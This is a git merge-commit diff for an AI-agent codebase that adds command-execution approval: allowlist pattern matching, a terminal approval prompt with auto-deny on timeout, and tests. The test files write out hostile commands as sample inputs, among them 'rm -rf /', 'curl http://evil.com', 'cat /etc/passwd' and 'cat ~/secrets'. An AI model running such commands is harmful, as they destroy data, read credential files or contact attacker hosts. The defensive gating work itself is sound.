Merge remote-tracking branch 'origin/main' into copilothub-web-search
This commit is contained in:
commit
ec6dbff61c
68 changed files with 4245 additions and 1371 deletions
|
|
@ -220,6 +220,11 @@ export class AsyncAgent {
|
|||
this.agent.reloadSystemPrompt();
|
||||
}
|
||||
|
||||
/** Ensure session messages are loaded from disk (idempotent) */
|
||||
async ensureInitialized(): Promise<void> {
|
||||
return this.agent.ensureInitialized();
|
||||
}
|
||||
|
||||
/**
|
||||
* Get all messages from the current session.
|
||||
*/
|
||||
|
|
|
|||
|
|
@ -3,6 +3,7 @@
|
|||
*/
|
||||
|
||||
import type { ToolsConfig } from "../tools/policy.js";
|
||||
import type { ExecApprovalConfig } from "../tools/exec-approval-types.js";
|
||||
|
||||
/** Profile filename constants */
|
||||
export const PROFILE_FILES = {
|
||||
|
|
@ -39,6 +40,8 @@ export interface ProfileConfig {
|
|||
thinkingLevel?: string;
|
||||
/** Reasoning mode: off, on, stream */
|
||||
reasoningMode?: "off" | "on" | "stream" | undefined;
|
||||
/** Exec approval configuration (security level, ask mode, allowlist) */
|
||||
execApproval?: ExecApprovalConfig | undefined;
|
||||
}
|
||||
|
||||
/** Agent Profile configuration */
|
||||
|
|
|
|||
|
|
@ -353,34 +353,7 @@ export class Agent {
|
|||
}
|
||||
|
||||
async run(prompt: string): Promise<AgentRunResult> {
|
||||
if (!this.initialized) {
|
||||
await this.session.repairIfNeeded((msg) => console.error(msg));
|
||||
const restoredMessages = this.session.loadMessages();
|
||||
if (restoredMessages.length > 0) {
|
||||
if (this.debug) {
|
||||
console.error(`[debug] Restoring ${restoredMessages.length} messages from session`);
|
||||
for (const msg of restoredMessages) {
|
||||
const msgAny = msg as any;
|
||||
const content = Array.isArray(msgAny.content)
|
||||
? msgAny.content.map((c: any) => c.type || "text").join(", ")
|
||||
: typeof msgAny.content;
|
||||
console.error(`[debug] ${msg.role}: ${content}`);
|
||||
if (Array.isArray(msgAny.content)) {
|
||||
for (const block of msgAny.content) {
|
||||
if (block.type === "tool_use") {
|
||||
console.error(`[debug] tool_use id: ${block.id}, name: ${block.name}`);
|
||||
}
|
||||
if (block.type === "tool_result") {
|
||||
console.error(`[debug] tool_result tool_use_id: ${block.tool_use_id}`);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
this.agent.replaceMessages(restoredMessages);
|
||||
}
|
||||
this.initialized = true;
|
||||
}
|
||||
await this.ensureInitialized();
|
||||
this.output.state.lastAssistantText = "";
|
||||
|
||||
const canRotate = !this.pinnedProfile && this.profileCandidates.length > 1;
|
||||
|
|
@ -537,6 +510,17 @@ export class Agent {
|
|||
return this.agent.state.tools?.map(t => t.name) ?? [];
|
||||
}
|
||||
|
||||
/** Ensure session messages are loaded from disk (idempotent) */
|
||||
async ensureInitialized(): Promise<void> {
|
||||
if (this.initialized) return;
|
||||
await this.session.repairIfNeeded((msg) => console.error(msg));
|
||||
const restoredMessages = this.session.loadMessages();
|
||||
if (restoredMessages.length > 0) {
|
||||
this.agent.replaceMessages(restoredMessages);
|
||||
}
|
||||
this.initialized = true;
|
||||
}
|
||||
|
||||
/** Get all messages from the current session */
|
||||
getMessages(): AgentMessage[] {
|
||||
return this.agent.state.messages.slice();
|
||||
|
|
|
|||
|
|
@ -10,6 +10,7 @@ import { createSessionsSpawnTool } from "./tools/sessions-spawn.js";
|
|||
import { createMemorySearchTool } from "./tools/memory-search.js";
|
||||
import { filterTools } from "./tools/policy.js";
|
||||
import { isMulticaError, isRetryableError } from "../shared/errors.js";
|
||||
import type { ExecApprovalCallback } from "./tools/exec-approval-types.js";
|
||||
|
||||
// Re-export resolveModel from providers for backwards compatibility
|
||||
export { resolveModel } from "./providers/index.js";
|
||||
|
|
@ -23,6 +24,8 @@ export interface CreateToolsOptions {
|
|||
isSubagent?: boolean | undefined;
|
||||
/** Session ID of the agent (passed to sessions_spawn tool) */
|
||||
sessionId?: string | undefined;
|
||||
/** Callback invoked when exec tool needs approval before running a command */
|
||||
onExecApprovalNeeded?: ExecApprovalCallback | undefined;
|
||||
}
|
||||
|
||||
type ToolErrorPayload = {
|
||||
|
|
@ -98,7 +101,7 @@ export function createAllTools(options: CreateToolsOptions | string): AgentTool<
|
|||
(tool) => tool.name !== "bash",
|
||||
) as AgentTool<any>[];
|
||||
|
||||
const execTool = createExecTool(cwd);
|
||||
const execTool = createExecTool(cwd, opts.onExecApprovalNeeded);
|
||||
const processTool = createProcessTool(cwd);
|
||||
const globTool = createGlobTool(cwd);
|
||||
const webFetchTool = createWebFetchTool();
|
||||
|
|
@ -153,6 +156,7 @@ export function resolveTools(options: ResolveToolsOptions): AgentTool<any>[] {
|
|||
profileDir: options.profileDir,
|
||||
isSubagent: options.isSubagent,
|
||||
sessionId: options.sessionId,
|
||||
onExecApprovalNeeded: options.onExecApprovalNeeded,
|
||||
});
|
||||
|
||||
// Apply policy filtering
|
||||
|
|
|
|||
164
src/agent/tools/exec-allowlist.test.ts
Normal file
164
src/agent/tools/exec-allowlist.test.ts
Normal file
|
|
@ -0,0 +1,164 @@
|
|||
import { describe, it, expect } from "vitest";
|
||||
import {
|
||||
matchAllowlist,
|
||||
addAllowlistEntry,
|
||||
recordAllowlistUse,
|
||||
removeAllowlistEntry,
|
||||
normalizeAllowlist,
|
||||
} from "./exec-allowlist.js";
|
||||
import type { ExecAllowlistEntry } from "./exec-approval-types.js";
|
||||
|
||||
describe("matchAllowlist", () => {
|
||||
const entries: ExecAllowlistEntry[] = [
|
||||
{ id: "1", pattern: "git *" },
|
||||
{ id: "2", pattern: "pnpm test" },
|
||||
{ id: "3", pattern: "ls **" },
|
||||
{ id: "4", pattern: "node --version" },
|
||||
];
|
||||
|
||||
it("matches wildcard patterns", () => {
|
||||
expect(matchAllowlist(entries, "git status")).toBeTruthy();
|
||||
expect(matchAllowlist(entries, "git push origin main")).toBeNull(); // * doesn't match spaces
|
||||
expect(matchAllowlist(entries, "git log")).toBeTruthy();
|
||||
});
|
||||
|
||||
it("matches exact patterns", () => {
|
||||
expect(matchAllowlist(entries, "pnpm test")).toBeTruthy();
|
||||
expect(matchAllowlist(entries, "node --version")).toBeTruthy();
|
||||
});
|
||||
|
||||
it("matches double-star patterns", () => {
|
||||
expect(matchAllowlist(entries, "ls -la /tmp/some/path")).toBeTruthy();
|
||||
});
|
||||
|
||||
it("is case-insensitive", () => {
|
||||
expect(matchAllowlist(entries, "GIT status")).toBeTruthy();
|
||||
expect(matchAllowlist(entries, "PNPM TEST")).toBeTruthy();
|
||||
});
|
||||
|
||||
it("returns null for non-matching commands", () => {
|
||||
expect(matchAllowlist(entries, "rm -rf /")).toBeNull();
|
||||
expect(matchAllowlist(entries, "curl http://evil.com")).toBeNull();
|
||||
expect(matchAllowlist(entries, "pnpm build")).toBeNull();
|
||||
});
|
||||
|
||||
it("returns null for empty inputs", () => {
|
||||
expect(matchAllowlist([], "git status")).toBeNull();
|
||||
expect(matchAllowlist(entries, "")).toBeNull();
|
||||
expect(matchAllowlist(entries, " ")).toBeNull();
|
||||
});
|
||||
});
|
||||
|
||||
describe("addAllowlistEntry", () => {
|
||||
it("adds new entry with UUID", () => {
|
||||
const entries: ExecAllowlistEntry[] = [];
|
||||
const result = addAllowlistEntry(entries, "git *");
|
||||
expect(result).toHaveLength(1);
|
||||
expect(result[0]!.pattern).toBe("git *");
|
||||
expect(result[0]!.id).toBeTruthy();
|
||||
expect(result[0]!.lastUsedAt).toBeTruthy();
|
||||
});
|
||||
|
||||
it("deduplicates by pattern", () => {
|
||||
const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "git *" }];
|
||||
const result = addAllowlistEntry(entries, "git *");
|
||||
expect(result).toHaveLength(1); // no new entry
|
||||
});
|
||||
|
||||
it("deduplicates case-insensitively", () => {
|
||||
const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "Git *" }];
|
||||
const result = addAllowlistEntry(entries, "git *");
|
||||
expect(result).toHaveLength(1);
|
||||
});
|
||||
|
||||
it("trims pattern", () => {
|
||||
const entries: ExecAllowlistEntry[] = [];
|
||||
const result = addAllowlistEntry(entries, " git * ");
|
||||
expect(result[0]!.pattern).toBe("git *");
|
||||
});
|
||||
|
||||
it("preserves existing entries", () => {
|
||||
const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "ls *" }];
|
||||
const result = addAllowlistEntry(entries, "git *");
|
||||
expect(result).toHaveLength(2);
|
||||
expect(result[0]!.pattern).toBe("ls *");
|
||||
});
|
||||
});
|
||||
|
||||
describe("recordAllowlistUse", () => {
|
||||
it("updates lastUsedAt and lastUsedCommand", () => {
|
||||
const entry: ExecAllowlistEntry = { id: "1", pattern: "git *" };
|
||||
const entries = [entry];
|
||||
const result = recordAllowlistUse(entries, entry, "git status");
|
||||
expect(result[0]!.lastUsedAt).toBeTruthy();
|
||||
expect(result[0]!.lastUsedCommand).toBe("git status");
|
||||
});
|
||||
|
||||
it("matches by ID", () => {
|
||||
const entries: ExecAllowlistEntry[] = [
|
||||
{ id: "1", pattern: "git *" },
|
||||
{ id: "2", pattern: "ls *" },
|
||||
];
|
||||
const result = recordAllowlistUse(entries, { id: "2", pattern: "ls *" }, "ls -la");
|
||||
expect(result[0]!.lastUsedCommand).toBeUndefined();
|
||||
expect(result[1]!.lastUsedCommand).toBe("ls -la");
|
||||
});
|
||||
|
||||
it("matches by pattern when no ID", () => {
|
||||
const entries: ExecAllowlistEntry[] = [{ pattern: "git *" }];
|
||||
const result = recordAllowlistUse(entries, { pattern: "git *" }, "git log");
|
||||
expect(result[0]!.lastUsedCommand).toBe("git log");
|
||||
});
|
||||
});
|
||||
|
||||
describe("removeAllowlistEntry", () => {
|
||||
it("removes by pattern", () => {
|
||||
const entries: ExecAllowlistEntry[] = [
|
||||
{ id: "1", pattern: "git *" },
|
||||
{ id: "2", pattern: "ls *" },
|
||||
];
|
||||
const result = removeAllowlistEntry(entries, "git *");
|
||||
expect(result).toHaveLength(1);
|
||||
expect(result[0]!.pattern).toBe("ls *");
|
||||
});
|
||||
|
||||
it("removes by ID", () => {
|
||||
const entries: ExecAllowlistEntry[] = [
|
||||
{ id: "1", pattern: "git *" },
|
||||
{ id: "2", pattern: "ls *" },
|
||||
];
|
||||
const result = removeAllowlistEntry(entries, "1");
|
||||
expect(result).toHaveLength(1);
|
||||
expect(result[0]!.id).toBe("2");
|
||||
});
|
||||
|
||||
it("is case-insensitive for patterns", () => {
|
||||
const entries: ExecAllowlistEntry[] = [{ id: "1", pattern: "Git *" }];
|
||||
const result = removeAllowlistEntry(entries, "git *");
|
||||
expect(result).toHaveLength(0);
|
||||
});
|
||||
});
|
||||
|
||||
describe("normalizeAllowlist", () => {
|
||||
it("assigns IDs to entries without them", () => {
|
||||
const entries: ExecAllowlistEntry[] = [{ pattern: "git *" }];
|
||||
const result = normalizeAllowlist(entries);
|
||||
expect(result[0]!.id).toBeTruthy();
|
||||
});
|
||||
|
||||
it("preserves existing IDs", () => {
|
||||
const entries: ExecAllowlistEntry[] = [{ id: "my-id", pattern: "git *" }];
|
||||
const result = normalizeAllowlist(entries);
|
||||
expect(result[0]!.id).toBe("my-id");
|
||||
});
|
||||
|
||||
it("deduplicates by pattern", () => {
|
||||
const entries: ExecAllowlistEntry[] = [
|
||||
{ id: "1", pattern: "git *" },
|
||||
{ id: "2", pattern: "Git *" }, // duplicate (case-insensitive)
|
||||
];
|
||||
const result = normalizeAllowlist(entries);
|
||||
expect(result).toHaveLength(1);
|
||||
expect(result[0]!.id).toBe("1"); // first one wins
|
||||
});
|
||||
});
|
||||
165
src/agent/tools/exec-allowlist.ts
Normal file
165
src/agent/tools/exec-allowlist.ts
Normal file
|
|
@ -0,0 +1,165 @@
|
|||
/**
|
||||
* Exec Allowlist — Persistent command pattern matching and management
|
||||
*
|
||||
* Allowlist entries use glob-like patterns to match against commands.
|
||||
* Patterns are matched against the full command string or binary name.
|
||||
*/
|
||||
|
||||
import { v7 as uuidv7 } from "uuid";
|
||||
import type { ExecAllowlistEntry } from "./exec-approval-types.js";
|
||||
|
||||
/**
|
||||
* Match a command against allowlist entries.
|
||||
* Returns the first matching entry, or null if no match.
|
||||
*
|
||||
* Matching rules:
|
||||
* - Patterns are case-insensitive
|
||||
* - "*" matches any sequence of non-space characters (within a segment)
|
||||
* - "**" matches any sequence (including spaces)
|
||||
* - Exact match on the full command or command prefix
|
||||
* - Pattern "git *" matches "git status", "git log", etc.
|
||||
*/
|
||||
export function matchAllowlist(
|
||||
entries: ExecAllowlistEntry[],
|
||||
command: string,
|
||||
): ExecAllowlistEntry | null {
|
||||
const normalizedCommand = command.trim().toLowerCase();
|
||||
if (!normalizedCommand) return null;
|
||||
|
||||
for (const entry of entries) {
|
||||
if (matchPattern(entry.pattern, normalizedCommand)) {
|
||||
return entry;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
/**
|
||||
* Match a glob-like pattern against a command string.
|
||||
*/
|
||||
function matchPattern(pattern: string, command: string): boolean {
|
||||
const normalizedPattern = pattern.trim().toLowerCase();
|
||||
if (!normalizedPattern) return false;
|
||||
|
||||
// Convert glob pattern to regex
|
||||
let regexStr = "^";
|
||||
let i = 0;
|
||||
while (i < normalizedPattern.length) {
|
||||
const ch = normalizedPattern[i]!;
|
||||
|
||||
if (ch === "*") {
|
||||
if (normalizedPattern[i + 1] === "*") {
|
||||
// ** matches anything (including spaces)
|
||||
regexStr += ".*";
|
||||
i += 2;
|
||||
} else {
|
||||
// * matches non-space characters
|
||||
regexStr += "[^\\s]*";
|
||||
i += 1;
|
||||
}
|
||||
} else if (ch === "?") {
|
||||
regexStr += "[^\\s]";
|
||||
i += 1;
|
||||
} else {
|
||||
// Escape regex special characters
|
||||
regexStr += ch.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
|
||||
i += 1;
|
||||
}
|
||||
}
|
||||
regexStr += "$";
|
||||
|
||||
try {
|
||||
return new RegExp(regexStr).test(command);
|
||||
} catch {
|
||||
// Fallback to exact match if regex is invalid
|
||||
return normalizedPattern === command;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Add an entry to the allowlist.
|
||||
* Deduplicates by pattern (case-insensitive).
|
||||
* Returns the updated entries array.
|
||||
*/
|
||||
export function addAllowlistEntry(
|
||||
entries: ExecAllowlistEntry[],
|
||||
pattern: string,
|
||||
): ExecAllowlistEntry[] {
|
||||
const normalizedPattern = pattern.trim().toLowerCase();
|
||||
|
||||
// Check for duplicate
|
||||
const existing = entries.find(
|
||||
(e) => e.pattern.trim().toLowerCase() === normalizedPattern,
|
||||
);
|
||||
if (existing) return entries;
|
||||
|
||||
const newEntry: ExecAllowlistEntry = {
|
||||
id: uuidv7(),
|
||||
pattern: pattern.trim(),
|
||||
lastUsedAt: Date.now(),
|
||||
};
|
||||
|
||||
return [...entries, newEntry];
|
||||
}
|
||||
|
||||
/**
|
||||
* Record usage of an allowlist entry.
|
||||
* Updates lastUsedAt and lastUsedCommand.
|
||||
* Returns the updated entries array.
|
||||
*/
|
||||
export function recordAllowlistUse(
|
||||
entries: ExecAllowlistEntry[],
|
||||
entry: ExecAllowlistEntry,
|
||||
command: string,
|
||||
): ExecAllowlistEntry[] {
|
||||
return entries.map((e) => {
|
||||
if (e === entry || (e.id && e.id === entry.id) || e.pattern === entry.pattern) {
|
||||
return {
|
||||
...e,
|
||||
lastUsedAt: Date.now(),
|
||||
lastUsedCommand: command,
|
||||
};
|
||||
}
|
||||
return e;
|
||||
});
|
||||
}
|
||||
|
||||
/**
|
||||
* Remove an allowlist entry by pattern or ID.
|
||||
* Returns the updated entries array.
|
||||
*/
|
||||
export function removeAllowlistEntry(
|
||||
entries: ExecAllowlistEntry[],
|
||||
patternOrId: string,
|
||||
): ExecAllowlistEntry[] {
|
||||
const normalized = patternOrId.trim().toLowerCase();
|
||||
return entries.filter(
|
||||
(e) =>
|
||||
e.pattern.trim().toLowerCase() !== normalized &&
|
||||
e.id !== patternOrId,
|
||||
);
|
||||
}
|
||||
|
||||
/**
|
||||
* Normalize allowlist entries: assign missing IDs, deduplicate.
|
||||
*/
|
||||
export function normalizeAllowlist(
|
||||
entries: ExecAllowlistEntry[],
|
||||
): ExecAllowlistEntry[] {
|
||||
const seen = new Set<string>();
|
||||
const result: ExecAllowlistEntry[] = [];
|
||||
|
||||
for (const entry of entries) {
|
||||
const key = entry.pattern.trim().toLowerCase();
|
||||
if (seen.has(key)) continue;
|
||||
seen.add(key);
|
||||
|
||||
result.push({
|
||||
...entry,
|
||||
id: entry.id ?? uuidv7(),
|
||||
});
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
187
src/agent/tools/exec-approval-cli.ts
Normal file
187
src/agent/tools/exec-approval-cli.ts
Normal file
|
|
@ -0,0 +1,187 @@
|
|||
/**
|
||||
* CLI Terminal Approval — readline-based approval for CLI mode (no Hub/Gateway)
|
||||
*/
|
||||
|
||||
import readline from "readline";
|
||||
import type {
|
||||
ExecApprovalCallback,
|
||||
ExecApprovalConfig,
|
||||
ApprovalDecision,
|
||||
ApprovalResult,
|
||||
} from "./exec-approval-types.js";
|
||||
import { DEFAULT_APPROVAL_TIMEOUT_MS } from "./exec-approval-types.js";
|
||||
import { evaluateCommandSafety, requiresApproval } from "./exec-safety.js";
|
||||
import { matchAllowlist, addAllowlistEntry, recordAllowlistUse } from "./exec-allowlist.js";
|
||||
|
||||
/** ANSI color helpers */
|
||||
const red = (s: string) => `\x1b[31m${s}\x1b[0m`;
|
||||
const yellow = (s: string) => `\x1b[33m${s}\x1b[0m`;
|
||||
const green = (s: string) => `\x1b[32m${s}\x1b[0m`;
|
||||
const bold = (s: string) => `\x1b[1m${s}\x1b[0m`;
|
||||
const dim = (s: string) => `\x1b[2m${s}\x1b[0m`;
|
||||
|
||||
/** Risk level color mapping */
|
||||
function colorRisk(level: string): string {
|
||||
switch (level) {
|
||||
case "dangerous": return red(level);
|
||||
case "needs-review": return yellow(level);
|
||||
case "safe": return green(level);
|
||||
default: return level;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Callback for persisting allowlist changes.
|
||||
* The Hub mode uses ProfileManager; CLI callers provide their own persistence.
|
||||
*/
|
||||
export type AllowlistPersister = (updatedConfig: ExecApprovalConfig) => void;
|
||||
|
||||
/**
|
||||
* Create a CLI-based approval callback that prompts the user in the terminal.
|
||||
*
|
||||
* @param config - Exec approval configuration (security, ask, allowlist, etc.)
|
||||
* @param onConfigUpdate - Optional callback to persist config changes (e.g., allowlist updates)
|
||||
*/
|
||||
export function createCliApprovalCallback(
|
||||
config: ExecApprovalConfig,
|
||||
onConfigUpdate?: AllowlistPersister,
|
||||
): ExecApprovalCallback {
|
||||
// Mutable copy of config for runtime allowlist updates
|
||||
const runtimeConfig = { ...config, allowlist: [...(config.allowlist ?? [])] };
|
||||
|
||||
return async (command: string, cwd: string | undefined): Promise<ApprovalResult> => {
|
||||
const security = runtimeConfig.security ?? "allowlist";
|
||||
const ask = runtimeConfig.ask ?? "on-miss";
|
||||
const timeoutMs = runtimeConfig.timeoutMs ?? DEFAULT_APPROVAL_TIMEOUT_MS;
|
||||
|
||||
// Security: deny blocks everything
|
||||
if (security === "deny") {
|
||||
return { approved: false, decision: "deny" };
|
||||
}
|
||||
|
||||
// Security: full allows everything
|
||||
if (security === "full") {
|
||||
return { approved: true, decision: "allow-once" };
|
||||
}
|
||||
|
||||
// Evaluate safety
|
||||
const evaluation = evaluateCommandSafety(command, runtimeConfig);
|
||||
|
||||
// Check if approval is needed
|
||||
const needsApproval = requiresApproval({
|
||||
ask,
|
||||
security,
|
||||
analysisOk: evaluation.analysisOk,
|
||||
allowlistSatisfied: evaluation.allowlistSatisfied,
|
||||
});
|
||||
|
||||
if (!needsApproval) {
|
||||
// Auto-approved: record allowlist usage if it was an allowlist match
|
||||
if (evaluation.allowlistSatisfied) {
|
||||
const match = matchAllowlist(runtimeConfig.allowlist ?? [], command);
|
||||
if (match) {
|
||||
runtimeConfig.allowlist = recordAllowlistUse(runtimeConfig.allowlist ?? [], match, command);
|
||||
onConfigUpdate?.(runtimeConfig);
|
||||
}
|
||||
}
|
||||
return { approved: true, decision: "allow-once" };
|
||||
}
|
||||
|
||||
// Prompt user in terminal
|
||||
const decision = await promptTerminal(command, cwd, evaluation.riskLevel, evaluation.reasons, timeoutMs);
|
||||
|
||||
if (decision === "allow-always") {
|
||||
// Extract binary or full command as allowlist pattern
|
||||
const pattern = extractAllowlistPattern(command);
|
||||
runtimeConfig.allowlist = addAllowlistEntry(runtimeConfig.allowlist ?? [], pattern);
|
||||
onConfigUpdate?.(runtimeConfig);
|
||||
}
|
||||
|
||||
return {
|
||||
approved: decision !== "deny",
|
||||
decision,
|
||||
};
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract an allowlist pattern from a command.
|
||||
* Uses the binary name + "**" for broad matching.
|
||||
*/
|
||||
function extractAllowlistPattern(command: string): string {
|
||||
const trimmed = command.trim();
|
||||
const binary = trimmed.split(/\s+/)[0];
|
||||
return binary ? `${binary} **` : trimmed;
|
||||
}
|
||||
|
||||
/**
|
||||
* Prompt the user for an approval decision via readline.
|
||||
*/
|
||||
function promptTerminal(
|
||||
command: string,
|
||||
cwd: string | undefined,
|
||||
riskLevel: string,
|
||||
reasons: string[],
|
||||
timeoutMs: number,
|
||||
): Promise<ApprovalDecision> {
|
||||
return new Promise((resolve) => {
|
||||
const rl = readline.createInterface({
|
||||
input: process.stdin,
|
||||
output: process.stderr, // Use stderr to avoid mixing with stdout piping
|
||||
});
|
||||
|
||||
let resolved = false;
|
||||
const cleanup = () => {
|
||||
if (resolved) return;
|
||||
resolved = true;
|
||||
rl.close();
|
||||
};
|
||||
|
||||
// Timeout: auto-deny
|
||||
const timer = setTimeout(() => {
|
||||
if (resolved) return;
|
||||
process.stderr.write(dim(`\n Approval timed out (${timeoutMs / 1000}s). Denying.\n\n`));
|
||||
cleanup();
|
||||
resolve("deny");
|
||||
}, timeoutMs);
|
||||
|
||||
// Display approval prompt
|
||||
process.stderr.write("\n");
|
||||
process.stderr.write(bold(" Exec approval required\n"));
|
||||
process.stderr.write(` ${dim("Command:")} ${command}\n`);
|
||||
if (cwd) process.stderr.write(` ${dim("CWD:")} ${cwd}\n`);
|
||||
process.stderr.write(` ${dim("Risk:")} ${colorRisk(riskLevel)}\n`);
|
||||
if (reasons.length > 0) {
|
||||
for (const reason of reasons) {
|
||||
process.stderr.write(` ${dim(" -")} ${reason}\n`);
|
||||
}
|
||||
}
|
||||
process.stderr.write("\n");
|
||||
|
||||
rl.question(
|
||||
` ${bold("[a]")}llow once / ${bold("[A]")}llow always / ${bold("[d]")}eny (default: deny): `,
|
||||
(answer) => {
|
||||
clearTimeout(timer);
|
||||
cleanup();
|
||||
|
||||
const trimmed = answer.trim();
|
||||
if (trimmed === "a" || trimmed === "allow-once") {
|
||||
resolve("allow-once");
|
||||
} else if (trimmed === "A" || trimmed === "allow-always") {
|
||||
resolve("allow-always");
|
||||
} else {
|
||||
resolve("deny");
|
||||
}
|
||||
},
|
||||
);
|
||||
|
||||
// Handle Ctrl+C gracefully
|
||||
rl.on("close", () => {
|
||||
clearTimeout(timer);
|
||||
if (!resolved) {
|
||||
resolved = true;
|
||||
resolve("deny");
|
||||
}
|
||||
});
|
||||
});
|
||||
}
|
||||
102
src/agent/tools/exec-approval-types.ts
Normal file
102
src/agent/tools/exec-approval-types.ts
Normal file
|
|
@ -0,0 +1,102 @@
|
|||
/**
|
||||
* Exec Approval System — Type Definitions
|
||||
*
|
||||
* Human-in-the-loop command execution approval for the exec tool.
|
||||
* Inspired by OpenClaw's defense-in-depth design.
|
||||
*/
|
||||
|
||||
// ============ Security Policy ============
|
||||
|
||||
/** Security level for exec commands */
|
||||
export type ExecSecurity = "deny" | "allowlist" | "full";
|
||||
|
||||
/** Ask mode — when to request human approval */
|
||||
export type ExecAsk = "off" | "on-miss" | "always";
|
||||
|
||||
/** User decision for an approval request */
|
||||
export type ApprovalDecision = "allow-once" | "allow-always" | "deny";
|
||||
|
||||
// ============ Approval Request/Response ============
|
||||
|
||||
/** Approval request sent to client (via WebSocket) or shown in CLI */
|
||||
export interface ExecApprovalRequest {
|
||||
/** Unique approval ID (UUIDv7) */
|
||||
approvalId: string;
|
||||
/** Agent that initiated the command */
|
||||
agentId: string;
|
||||
/** Shell command to execute */
|
||||
command: string;
|
||||
/** Working directory */
|
||||
cwd?: string;
|
||||
/** Evaluated risk level */
|
||||
riskLevel: "safe" | "needs-review" | "dangerous";
|
||||
/** Reasons for the risk assessment */
|
||||
riskReasons: string[];
|
||||
/** When this approval expires (ms since epoch) */
|
||||
expiresAtMs: number;
|
||||
}
|
||||
|
||||
/** Result returned after approval decision */
|
||||
export interface ApprovalResult {
|
||||
approved: boolean;
|
||||
decision: ApprovalDecision;
|
||||
}
|
||||
|
||||
// ============ Configuration ============
|
||||
|
||||
/** Exec approval configuration (stored in profile config) */
|
||||
export interface ExecApprovalConfig {
|
||||
/** Security level: "deny" blocks all, "allowlist" requires matching, "full" allows all */
|
||||
security?: ExecSecurity;
|
||||
/** Ask mode: "off" never asks, "on-miss" asks when allowlist misses, "always" always asks */
|
||||
ask?: ExecAsk;
|
||||
/** Timeout before auto-deny in milliseconds (default: 60_000) */
|
||||
timeoutMs?: number;
|
||||
/** Fallback security level on timeout (default: "deny" — fail-closed) */
|
||||
askFallback?: ExecSecurity;
|
||||
/** Persistent allowlist of approved command patterns */
|
||||
allowlist?: ExecAllowlistEntry[];
|
||||
}
|
||||
|
||||
/** Default timeout for approval requests (60 seconds) */
|
||||
export const DEFAULT_APPROVAL_TIMEOUT_MS = 60_000;
|
||||
|
||||
// ============ Allowlist ============
|
||||
|
||||
/** A single allowlist entry */
|
||||
export interface ExecAllowlistEntry {
|
||||
/** Unique entry ID (auto-generated UUID) */
|
||||
id?: string;
|
||||
/** Glob pattern to match against command binary or full command */
|
||||
pattern: string;
|
||||
/** Last time this entry was used (ms since epoch) */
|
||||
lastUsedAt?: number;
|
||||
/** Last command that matched this entry */
|
||||
lastUsedCommand?: string;
|
||||
}
|
||||
|
||||
// ============ Callback ============
|
||||
|
||||
/**
|
||||
* Callback injected into the exec tool for approval flow.
|
||||
* Abstracts the communication channel (Hub WebSocket vs CLI readline).
|
||||
* Returns a promise that resolves when the user makes a decision.
|
||||
*/
|
||||
export type ExecApprovalCallback = (
|
||||
command: string,
|
||||
cwd: string | undefined,
|
||||
) => Promise<ApprovalResult>;
|
||||
|
||||
// ============ Safety Evaluation ============
|
||||
|
||||
/** Result of command safety evaluation */
|
||||
export interface SafetyEvaluation {
|
||||
/** Overall risk level */
|
||||
riskLevel: "safe" | "needs-review" | "dangerous";
|
||||
/** Reasons explaining the risk assessment */
|
||||
reasons: string[];
|
||||
/** Whether shell syntax analysis passed */
|
||||
analysisOk: boolean;
|
||||
/** Whether the command matched the allowlist */
|
||||
allowlistSatisfied: boolean;
|
||||
}
|
||||
287
src/agent/tools/exec-safety.test.ts
Normal file
287
src/agent/tools/exec-safety.test.ts
Normal file
|
|
@ -0,0 +1,287 @@
|
|||
import { describe, it, expect } from "vitest";
|
||||
import {
|
||||
evaluateCommandSafety,
|
||||
requiresApproval,
|
||||
minSecurity,
|
||||
maxAsk,
|
||||
extractBinaryName,
|
||||
hasFilePathArgs,
|
||||
isSafeBinUsage,
|
||||
analyzeShellSyntax,
|
||||
detectDangerousPatterns,
|
||||
DEFAULT_SAFE_BINS,
|
||||
} from "./exec-safety.js";
|
||||
|
||||
describe("extractBinaryName", () => {
|
||||
it("extracts simple binary names", () => {
|
||||
expect(extractBinaryName("ls")).toBe("ls");
|
||||
expect(extractBinaryName("git status")).toBe("git");
|
||||
expect(extractBinaryName(" node --version ")).toBe("node");
|
||||
});
|
||||
|
||||
it("extracts binary from absolute path", () => {
|
||||
expect(extractBinaryName("/usr/bin/git status")).toBe("git");
|
||||
expect(extractBinaryName("/usr/local/bin/node")).toBe("node");
|
||||
});
|
||||
|
||||
it("handles env prefix", () => {
|
||||
expect(extractBinaryName("env FOO=bar git status")).toBe("git");
|
||||
expect(extractBinaryName("env NODE_ENV=test node app.js")).toBe("node");
|
||||
});
|
||||
|
||||
it("extracts first command in pipe", () => {
|
||||
expect(extractBinaryName("grep pattern | head -5")).toBe("grep");
|
||||
expect(extractBinaryName("cat | sort | uniq")).toBe("cat");
|
||||
});
|
||||
|
||||
it("returns null for empty command", () => {
|
||||
expect(extractBinaryName("")).toBeNull();
|
||||
expect(extractBinaryName(" ")).toBeNull();
|
||||
});
|
||||
});
|
||||
|
||||
describe("hasFilePathArgs", () => {
|
||||
it("detects absolute paths", () => {
|
||||
expect(hasFilePathArgs("cat /etc/passwd")).toBe(true);
|
||||
expect(hasFilePathArgs("rm /tmp/file")).toBe(true);
|
||||
});
|
||||
|
||||
it("detects relative paths", () => {
|
||||
expect(hasFilePathArgs("cat ./file")).toBe(true);
|
||||
expect(hasFilePathArgs("rm ../other/file")).toBe(true);
|
||||
});
|
||||
|
||||
it("detects home paths", () => {
|
||||
expect(hasFilePathArgs("cat ~/secrets")).toBe(true);
|
||||
});
|
||||
|
||||
it("detects file paths in flag values", () => {
|
||||
expect(hasFilePathArgs("cmd --output=/tmp/file")).toBe(true);
|
||||
});
|
||||
|
||||
it("returns false for commands without file paths", () => {
|
||||
expect(hasFilePathArgs("grep -i pattern")).toBe(false);
|
||||
expect(hasFilePathArgs("echo hello world")).toBe(false);
|
||||
expect(hasFilePathArgs("git status")).toBe(false);
|
||||
});
|
||||
});
|
||||
|
||||
describe("isSafeBinUsage", () => {
|
||||
it("approves safe binaries without file args", () => {
|
||||
expect(isSafeBinUsage("ls")).toBe(true);
|
||||
